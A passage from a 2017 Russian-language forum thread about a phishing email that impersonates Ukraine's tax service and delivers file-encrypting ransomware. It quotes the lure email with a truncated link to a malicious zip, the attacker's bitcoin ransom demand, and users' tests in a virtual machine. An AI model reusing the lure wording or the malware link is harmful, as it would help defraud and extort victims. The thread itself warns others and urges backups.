Сообщение отредактировал Console - Mar 7 2017, 18:37

[schweps]

вот сегодня бомбочку бухгалтер словила

Письмо Міністерство Доходів і Зборів - вам штраф

и типа ссылка красивая на сайт киевской ДФС

Заходит по ссылке - качает файлик, З_А_П_У_С_К_А_Е_Т!

и вуаля - все файлы на компе превращаются...превращаются в кучку зашифрованных файлов =)

короче весело, ищу щас решение, пока ничего не берет, вирь из свежих

[public@]

Державна фіскальна служба України Кому: мне
Вчера, 16:06оплата рахунку
Шановний платник податків .

Повідомляємо Вас про наявну заборгованість!
Загрузити можете з нашого сайту:

https://sta-sumy.gov.ua/downloads/2017-03/7....html?tm=156243

А в ссылку прикреплена другая ссылка
http://www.tronenglish.com/news/wp-content...s/documents.zip

Якщо у Вас виникли питання Ви можете зателефонувати за телефонами,
вказаними на нашому сайті.

З повагою,відділ по роботі з клієнтами,
Манько Олеся Юрьївна

Сообщение отредактировал public@ - Mar 16 2017, 19:35

[Balamut74]

Загрузити можете з нашого сайту:
https://sta-sumy.gov.ua/downloads/2017-03/7....html?tm=156243

так загрузи и запусти, по результатам не забудь отписаться!

[schweps]

ага такой наломный прикол)) инфы умерло море, и расшифровки походу нету

[Console]

http://sfs.gov.ua/media-tsentr/novini/289258.html
На ITC еще вроде было...

Посилання, що міститься у тексті листа та нібито перенаправляє на портал ДФС, насправді є гіперпосиланням, яке веде на сторонню Інтернет-сторінку та призводить до завантаження вірусного файлу (троянської програми).

[symbian9]

так загрузи и запусти, по результатам не забудь отписаться!

в виртуалке ничего не происходит. 7х64 с обновами по 15.01.17.
после запуска спрашивает что делать с "%name%.tmp"


файлы на рабочем столе и в документах есть и открываются.

[schweps]

Испробовал все лекарства - ничем не дешифровывается)

Написал даже этому "хакеру" как он и просил в реадме.тхт

ответ:

Стоимость дешифровки 200$. Пришлите 1 файл(бесплатно расшифровываю 1 файл весом до 2 мб,не содержащий важной информации, только для того чтобы вы смогли опознать, что это ваш файл,
никаких отчетностей, дипломов, курсовых, презентаций бесплатно расшифровываться не будет и мы расшифруем в качестве подтверждения того что файлы могут быть восстановлены).
В течение от 5 минут до часа с момента оплаты вышлем программу и ключ которая в точности вернет все как было.
Не пытайтесь восстановить данные с помощью антивирусных утилит, испортите все файлы
Если хотите попробывать, пробуйте на другом ПК и минимум файлов, иначе потом даже я не смогу помочь.
И помните пожалуйста, что цена каждый день растет.
PS Пишите четко, ясно, предельно понятно, учитывайте, что кроме Вас пишет много человек,
в диалоги не вступаю, работа по приницпу быстро заплатил, сразу получил.Не устраивает цена услуги, больше не пишите.
Биткоины можно купить или добывать БЕСПЛАТНО, например майнить.О майнинге можно почитать в википедии или на других ресурсах.
УСлуга расшифровки бесплатная.Вам выбирать, бесплатно добывать биткоины либо не теряя времени их купить.Решать только Вам

200 уе биткоинами говорит иди намайни по быстрому и приходи

если бы у меня там были важные файлы или типа того пришлось бы платить...

делайте бекапы люди)

[chip_]

У нас такие типо от привата приходят, предприимчивые гады)))

[symbian9]

» Нажмите, чтобы показать спойлер - нажмите опять, чтобы скрыть... «

в виртуалке ничего не происходит. 7х64 с обновами по 15.01.17.
после запуска спрашивает что делать с "%name%.tmp"


файлы на рабочем столе и в документах есть и открываются.

MSDN SP1 без обновлений ведет себя аналогично. может нужно подождать?